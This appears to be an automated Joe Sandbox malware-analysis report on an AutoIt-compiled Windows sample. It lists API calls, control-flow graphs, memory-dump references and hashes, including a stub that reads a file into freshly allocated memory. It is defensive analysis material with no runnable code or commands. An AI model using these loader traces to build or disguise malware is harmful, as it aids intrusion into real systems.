                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C79452
                                                                                                                            • _wcsncpy.LIBCMT ref: 00C794C5
                                                                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00C794FB
                                                                                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C79511
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79522
                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1500180987-0
                                                                                                                            • Opcode ID: c956010794b2bacaf9e0761ca9f3b998ba11fe01883c4ec37f2b35fe43ca9020
                                                                                                                            • Instruction ID: e25e9c67e9a14cbbb04740d6b88968984e16f8493228c298679b4036873b35c3
                                                                                                                            • Opcode Fuzzy Hash: c956010794b2bacaf9e0761ca9f3b998ba11fe01883c4ec37f2b35fe43ca9020
                                                                                                                            • Instruction Fuzzy Hash: 66C15CB1D00229AADF25DF95CC85EDEB7BDEF45310F0080AAF609E7151EB309A859F61

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                            • Opcode ID: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
                                                                                                                            • Instruction ID: 71672453e8d2f570e82b2d8c87a74e2d33695a88dfb93dcbb8109e8529ad4b4c
                                                                                                                            • Opcode Fuzzy Hash: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
                                                                                                                            • Instruction Fuzzy Hash: 403105B1941219AFDB409FA4EC89BDDBBF4FB09310F10412EE580E62A0D7B5459ACF90

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C13A50
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C13A76
                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00C13A88
                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00C13A9A
                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
                                                                                                                            • RegisterClassExW.USER32(?), ref: 00C13B16
                                                                                                                              • Part of subcall function 00C13041: GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                                                                              • Part of subcall function 00C13041: RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                                                                              • Part of subcall function 00C13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                                                                              • Part of subcall function 00C13041: InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                                                                              • Part of subcall function 00C13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                                                                              • Part of subcall function 00C13041: LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                                                                              • Part of subcall function 00C13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                            • String ID: #$(l$0$AutoIt v3
                                                                                                                            • API String ID: 423443420-1873447343
                                                                                                                            • Opcode ID: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
                                                                                                                            • Instruction ID: cfe1d9f90afb732822162ea30104adfbaf16c267a76ce14597b0ebecb4fac47a
                                                                                                                            • Opcode Fuzzy Hash: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
                                                                                                                            • Instruction Fuzzy Hash: 10213770902308AFEB10DFA4EC09BAD7BB0FB08716F10012BF504EA2A1D7B556589F84

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                            • Opcode ID: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
                                                                                                                            • Instruction ID: f2731a3f60fdee52de31ae444f69b32aac15812c3477bb8e2a666026a00e40d4
                                                                                                                            • Opcode Fuzzy Hash: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
                                                                                                                            • Instruction Fuzzy Hash: E921C0B1942618AFDB00DFA8EC89BDDBBF8FB08701F10412BFA10E62A0D7B145559F91

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CD52F8,?,00C137AE,?), ref: 00C14724
                                                                                                                              • Part of subcall function 00C3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C17165), ref: 00C3052D
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C171A8
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C4E8C8
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C4E909
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C4E947
                                                                                                                            • _wcscat.LIBCMT ref: 00C4E9A0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                            • API String ID: 2673923337-2727554177
                                                                                                                            • Opcode ID: 8fb1a3607b94576a255b7bee7d7cfaa2d24f4339feb2a02a103876b308ce77d1
                                                                                                                            • Instruction ID: 46ce5c5417486c0b868a2466d8359699cfe9ada9f2fd1a52065faabac32df4b3
                                                                                                                            • Opcode Fuzzy Hash: 8fb1a3607b94576a255b7bee7d7cfaa2d24f4339feb2a02a103876b308ce77d1
                                                                                                                            • Instruction Fuzzy Hash: 1C716C715093019EC700EF65E881AAFBBF8FF95310F40092EF445C71A1EB719949DB92

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$
                                                                                                                            • API String ID: 1825951767-2885450264
                                                                                                                            • Opcode ID: 7a57b76497047cf940b312afd9e4221eaf1321aef4f58feacc1dc9edb271d095
                                                                                                                            • Instruction ID: 24def29bb09bb11c19d302b395ce5e5fbd7f4bdb3d042682cb89d885fa4d9e87
                                                                                                                            • Opcode Fuzzy Hash: 7a57b76497047cf940b312afd9e4221eaf1321aef4f58feacc1dc9edb271d095
                                                                                                                            • Instruction Fuzzy Hash: B8A1A07190021D9ACF05EBA0DC95EEEB778FF16314F00002AF416B7191EF709A89EBA0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 885 c13633-c13681 887 c136e1-c136e3 885->887 888 c13683-c13686 885->888 887->888 889 c136e5 887->889 890 c136e7 888->890 891 c13688-c1368f 888->891 892 c136ca-c136d2 DefWindowProcW 889->892 893 c4d0cc-c4d0fa call c21070 call c21093 890->893 894 c136ed-c136f0 890->894 895 c13695-c1369a 891->895 896 c1374b-c13753 PostQuitMessage 891->896 903 c136d8-c136de 892->903 932 c4d0ff-c4d106 893->932 897 c136f2-c136f3 894->897 898 c13715-c1373c SetTimer RegisterWindowMessageW 894->898 900 c4d154-c4d168 call c72527 895->900 901 c136a0-c136a2 895->901 902 c13711-c13713 896->902 904 c136f9-c1370c KillTimer call c1443a call c13114 897->904 905 c4d06f-c4d072 897->905 898->902 907 c1373e-c13749 CreatePopupMenu 898->907 900->902 926 c4d16e 900->926 908 c13755-c13764 call c144a0 901->908 909 c136a8-c136ad 901->909 902->903 904->902 911 c4d074-c4d076 905->911 912 c4d0a8-c4d0c7 MoveWindow 905->912 907->902 908->902 915 c136b3-c136b8 909->915 916 c4d139-c4d140 909->916 919 c4d097-c4d0a3 SetFocus 911->919 920 c4d078-c4d07b 911->920 912->902 924 c4d124-c4d134 call c72d36 915->924 925 c136be-c136c4 915->925 916->892 922 c4d146-c4d14f call c67c36 916->922 919->902 920->925 928 c4d081-c4d092 call c21070 920->928 922->892 924->902 925->892 925->932 926->892 928->902 932->892 936 c4d10c-c4d11f call c1443a call c1434a 932->936 936->892
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00C136D2
                                                                                                                            • KillTimer.USER32(?,00000001), ref: 00C136FC
                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C1371F
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C1372A
                                                                                                                            • CreatePopupMenu.USER32 ref: 00C1373E
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00C1374D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                            • String ID: TaskbarCreated
                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                            • Opcode ID: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
                                                                                                                            • Instruction ID: 9fd7d11072b318a199fe3af3c4d7e7c87f1e0fe6f5becf4374f145c4eac292e8
                                                                                                                            • Opcode Fuzzy Hash: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
                                                                                                                            • Instruction Fuzzy Hash: EE4104F1200585FBDB24AF64ED09BFD3B55FB07305F14012AFA12D62E1DA609B85B6A1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 942 c139d5-c13a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
                                                                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00C13A38
                                                                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00C13A41
                                                                                                                            Strings
                                                                                                                            • ) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the, xrefs: 00C139F6
                                                                                                                            • edit, xrefs: 00C13A1E
                                                                                                                            • AutoIt v3, xrefs: 00C139FB, 00C13A00, 00C13A01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShow
                                                                                                                            • String ID: ) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the$AutoIt v3$edit
                                                                                                                            • API String ID: 1584632944-48068084
                                                                                                                            • Opcode ID: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
                                                                                                                            • Instruction ID: f4b54e44a04e13fd4bf8279e5924b6fe6ea2e8a32c3672ced0067db3d0bef0e8
                                                                                                                            • Opcode Fuzzy Hash: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
                                                                                                                            • Instruction Fuzzy Hash: 22F03474602290BEEA305B23AC8CF6F3F7DE7C6F50B02002FB900E21B0C6610806DAB0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 943 10275c0-102766e call 1024fe0 946 1027675-102769b call 10284d0 CreateFileW 943->946 949 10276a2-10276b2 946->949 950 102769d 946->950 955 10276b4 949->955 956 10276b9-10276d3 VirtualAlloc 949->956 951 10277ed-10277f1 950->951 952 1027833-1027836 951->952 953 10277f3-10277f7 951->953 957 1027839-1027840 952->957 958 1027803-1027807 953->958 959 10277f9-10277fc 953->959 955->951 960 10276d5 956->960 961 10276da-10276f1 ReadFile 956->961 962 1027842-102784d 957->962 963 1027895-10278aa 957->963 964 1027817-102781b 958->964 965 1027809-1027813 958->965 959->958 960->951 968 10276f3 961->968 969 10276f8-1027738 VirtualAlloc 961->969 970 1027851-102785d 962->970 971 102784f 962->971 972 10278ba-10278c2 963->972 973 10278ac-10278b7 VirtualFree 963->973 966 102782b 964->966 967 102781d-1027827 964->967 965->964 966->952 967->966 968->951 974 102773a 969->974 975 102773f-102775a call 1028720 969->975 976 1027871-102787d 970->976 977 102785f-102786f 970->977 971->963 973->972 974->951 983 1027765-102776f 975->983 980 102788a-1027890 976->980 981 102787f-1027888 976->981 979 1027893 977->979 979->957 980->979 981->979 984 10277a2-10277b6 call 1028530 983->984 985 1027771-10277a0 call 1028720 983->985 990 10277ba-10277be 984->990 991 10277b8 984->991 985->983 993 10277c0-10277c4 CloseHandle 990->993 994 10277ca-10277ce 990->994 991->951 993->994 995 10277d0-10277db VirtualFree 994->995 996 10277de-10277e7 994->996 995->996 996->946 996->951
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01027691
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010278B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 204039940-0
                                                                                                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                            • Instruction ID: cb61eea5a980b3c86e11a96612b872cc5cdd84f8ade16772a6c408417ae83073
                                                                                                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                            • Instruction Fuzzy Hash: 87A12A74E00219EBDB14CFA8C894BEEBBB5FF58304F208599E641BB281D7759A41CF94

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1074 1027390-10274b9 call 1024fe0 call 1027280 CreateFileW 1081 10274c0-10274d0 1074->1081 1082 10274bb 1074->1082 1085 10274d2 1081->1085 1086 10274d7-10274f1 VirtualAlloc 1081->1086 1083 1027570-1027575 1082->1083 1085->1083 1087 10274f3 1086->1087 1088 10274f5-102750c ReadFile 1086->1088 1087->1083 1089 1027510-102754a call 10272c0 call 1026280 1088->1089 1090 102750e 1088->1090 1095 1027566-102756e ExitProcess 1089->1095 1096 102754c-1027561 call 1027310 1089->1096 1090->1083 1095->1083 1096->1095
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 01027280: Sleep.KERNELBASE(000001F4), ref: 01027291
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010274AF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileSleep
                                                                                                                            • String ID: SVM98D9L4XE
                                                                                                                            • API String ID: 2694422964-2928599538
                                                                                                                            • Opcode ID: ee4bdea5bc9ed4ae22841a431094ceab17212766985a34bcc457ecc2fc500011
                                                                                                                            • Instruction ID: 1eb92ed5054f7bb7c319c92a228d7de447f5093dcdf5479678b9570e39ea99b7
                                                                                                                            • Opcode Fuzzy Hash: ee4bdea5bc9ed4ae22841a431094ceab17212766985a34bcc457ecc2fc500011
                                                                                                                            • Instruction Fuzzy Hash: 51517130D04259EBEF15DBB4C814BEEBB79AF58300F004599E648BB2C0DBB91B45CBA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1098 c1407c-c14092 1099 c14098-c140ad call c17a16 1098->1099 1100 c1416f-c14173 1098->1100 1103 c140b3-c140d3 call c17bcc 1099->1103 1104 c4d3c8-c4d3d7 LoadStringW 1099->1104 1107 c4d3e2-c4d3fa call c17b2e call c16fe3 1103->1107 1108 c140d9-c140dd 1103->1108 1104->1107 1117 c140ed-c1416a call c32de0 call c1454e call c32dbc Shell_NotifyIconW call c15904 1107->1117 1120 c4d400-c4d41e call c17cab call c16fe3 call c17cab 1107->1120 1110 c140e3-c140e8 call c17b2e 1108->1110 1111 c14174-c1417d call c18047 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C4D3D7
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            • _memset.LIBCMT ref: 00C140FC
                                                                                                                            • _wcscpy.LIBCMT ref: 00C14150
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                            • String ID: Line:
                                                                                                                            • API String ID: 3942752672-1585850449
                                                                                                                            • Opcode ID: 57efd98cf7eba6775db6a09c8b71c126bac42c7ff3a6b4a6dc9125423e6949e7
                                                                                                                            • Instruction ID: 92ce8a973995198470077802af5430e7f7b7876de9a97ba8a9b28464ddd69299
                                                                                                                            • Opcode Fuzzy Hash: 57efd98cf7eba6775db6a09c8b71c126bac42c7ff3a6b4a6dc9125423e6949e7
